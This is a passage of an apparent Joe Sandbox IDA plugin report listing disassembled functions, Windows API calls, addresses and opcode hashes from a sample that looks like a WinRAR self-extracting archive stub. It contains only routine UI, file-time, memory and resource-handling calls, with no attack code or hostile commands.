                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 9f3813fcd6fb17611c1dbe08d7db14c15d416035700ef8bdc8708b4dacd7c980
                                                              • Instruction ID: 862c76aa1849667d9bbc0e2d18baf8106efd384945248329448cf5cfb4153269
                                                              • Opcode Fuzzy Hash: 9f3813fcd6fb17611c1dbe08d7db14c15d416035700ef8bdc8708b4dacd7c980
                                                              • Instruction Fuzzy Hash: D2419330A00218AFDF20DF6CC885A9EBFA5FF46324F148155E815EB792D775AA01CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00899EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00899F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00899FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00899FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00899FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName
                                                              • API String ID: 3937224194-1658105358
                                                              • Opcode ID: 99eb540a46753b57ffd163d050836c9eb367e9c8c3b5f9b5917928777c353c2b
                                                              • Instruction ID: ce77b316c691ef52f8b40aaec91df8e0f4336c797e47d55e244cd0ff1944aa32
                                                              • Opcode Fuzzy Hash: 99eb540a46753b57ffd163d050836c9eb367e9c8c3b5f9b5917928777c353c2b
                                                              • Instruction Fuzzy Hash: DF419E32004214EFDB216F68DC8DB6BBBA8FB48715F08455DF84ADA156DB34DE04CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
                                                              • Instruction ID: 88fbf34d6f46b83201030b4c2a15067bb34ccfbc22a8381950f8ee7889740ec7
                                                              • Opcode Fuzzy Hash: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
                                                              • Instruction Fuzzy Hash: 57318B3264431556EE34BB5C9C03B7A73E4FB91320F58841FF4C6D7280FAA4AD9083A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AC868: _free.LIBCMT ref: 008AC891
                                                              • _free.LIBCMT ref: 008AC8F2
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008AC8FD
                                                              • _free.LIBCMT ref: 008AC908
                                                              • _free.LIBCMT ref: 008AC95C
                                                              • _free.LIBCMT ref: 008AC967
                                                              • _free.LIBCMT ref: 008AC972
                                                              • _free.LIBCMT ref: 008AC97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: 6ac289a09407c778afec09ec23680d2eedb56ab7f7899baaea9457ec707636d9
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 0811FC71580B04EAF520BBB5CC06FCB7BECFF06B00F404825B3ADE6892DB69A5058752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0089E669,0089E5CC,0089E86D), ref: 0089E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0089E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0089E630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
                                                              • Instruction ID: d67d5dbf840ceb858b5cf808d2d7785a7930c6d108d663341d2f1bc911a4680b
                                                              • Opcode Fuzzy Hash: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
                                                              • Instruction Fuzzy Hash: 44F0C2317806625B4F33FEA95C886BA2BC8FB357453180539E901D7200EB24CC55DA90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008914C2
                                                                • Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008914E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00891500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00891513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
                                                              • Instruction ID: 8a9559029baf86a63f0b8cbd173920c3cf9063a096f30c5688eaff2d43fe154f
                                                              • Opcode Fuzzy Hash: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
                                                              • Instruction Fuzzy Hash: 5B31D775108346ABC704DFA8C88499BB7ECFF98754F044A1EF995C3210E730D549CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,008A2AF1,008A02FC,0089FA34), ref: 008A2B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008A2B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2B2F
                                                              • SetLastError.KERNEL32(00000000,008A2AF1,008A02FC,0089FA34), ref: 008A2B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
                                                              • Instruction ID: 7ee7cf312cc0556ef2f6e5120430470f2fca0e7bfe648e18d57a177e4a297c55
                                                              • Opcode Fuzzy Hash: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
                                                              • Instruction Fuzzy Hash: 5301B172109719AFB6342B7C6C85A662B59FF037747604739F511E5CE0EE114C029268
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
                                                              • _free.LIBCMT ref: 008A981C
                                                              • _free.LIBCMT ref: 008A9844
                                                              • SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A9851
                                                              • SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
                                                              • _abort.LIBCMT ref: 008A9863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
                                                              • Instruction ID: f1cef9b47ba1d46d1f0c99f66e9644016afa6d3e95aeab3d09f6dc007c3de149
                                                              • Opcode Fuzzy Hash: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
                                                              • Instruction Fuzzy Hash: BEF0A435148A0566F71233386C0AA5B2B69FFD3B61F240234F664D2DA2FF2888028566
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089DC72
                                                              • TranslateMessage.USER32(?), ref: 0089DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0089DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
                                                              • Instruction ID: 55a6828971d18251f8df7c8679aefc673971eadfe81a69c002cc005ea95796f8
                                                              • Opcode Fuzzy Hash: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
                                                              • Instruction Fuzzy Hash: 25F03C72A01229BBCF20ABA5DC4CDDB7F6DFF41791B044111F50AD6050D6749A46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 0088B92D: _wcsrchr.LIBVCRUNTIME ref: 0088B944
                                                              • _wcslen.LIBCMT ref: 0088C197
                                                              • _wcslen.LIBCMT ref: 0088C1DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
                                                              • Instruction ID: 9fa9ad3eb207b9f33b4fe77f12a5170af6caf65092c897021e04b1eee728dc37
                                                              • Opcode Fuzzy Hash: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
                                                              • Instruction Fuzzy Hash: 2A41572655071599CB32BF788846A7BB3A8FF41744F14090EF892EB1C6EB704D81C3B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0089CE9D
                                                                • Part of subcall function 0088B690: _wcslen.LIBCMT ref: 0088B696
                                                              • _swprintf.LIBCMT ref: 0089CED1
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(?,00000066,008C946A), ref: 0089CEF1
                                                              • EndDialog.USER32(?,00000001), ref: 0089CFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 110358324-1360425832
                                                              • Opcode ID: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
                                                              • Instruction ID: acbbc7b6b900db803d1a9d8d603a0cfffc0e0c2466cf78e5f7fc14d17250a08f
                                                              • Opcode Fuzzy Hash: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
                                                              • Instruction Fuzzy Hash: 7441BFB1800658AADF25EBA4CC45EEE77BCFB05301F4480A6F90AE7141EF718A44CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0088BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0088A275,?,?,00000800,?,0088A23A,?,0088755C), ref: 0088BBC5
                                                              • _wcslen.LIBCMT ref: 0088BC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
                                                              • Instruction ID: 91ff8af6b0e8401a1f708d2c1c198ff9be99b8233cc3f3077279760dc6dc5421
                                                              • Opcode Fuzzy Hash: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
                                                              • Instruction Fuzzy Hash: B741AE3144021AAADF21BF64CC01EEA77AAFF81390F144466F865E3251EB74EE908B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0089B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0089B712
                                                              • DeleteObject.GDI32(00000000), ref: 0089B744
                                                              • DeleteObject.GDI32(00000000), ref: 0089B767
                                                                • Part of subcall function 0089A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
                                                                • Part of subcall function 0089A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
                                                                • Part of subcall function 0089A6C2: LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
                                                                • Part of subcall function 0089A6C2: LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
                                                                • Part of subcall function 0089A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
                                                                • Part of subcall function 0089A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
                                                                • Part of subcall function 0089A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
                                                                • Part of subcall function 0089A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6
                                                                • Part of subcall function 0089A6C2: GlobalFree.KERNEL32(00000000), ref: 0089A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                              • String ID: ]
                                                              • API String ID: 1428510222-3352871620
                                                              • Opcode ID: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
                                                              • Instruction ID: 29ab669a42fac498289cde23deeb5bbef0096bbe9c0128092523124da5c3ba90
                                                              • Opcode Fuzzy Hash: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
                                                              • Instruction Fuzzy Hash: DB01A13650051577CF1277B86D89A7B7ABAFBC0B62F1D0110F900E7291DB218D0542A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0089D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0089D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0089D684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
                                                              • Instruction ID: 3b372c58768a1aecc9fe52f2543ace1f3d5b01c0d907b8a7f528b6706fc93deb
                                                              • Opcode Fuzzy Hash: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
                                                              • Instruction Fuzzy Hash: B9014533245314BADA126F649D09F57775CFBAAB01F040011F302E6091C7A29A049BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A7EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
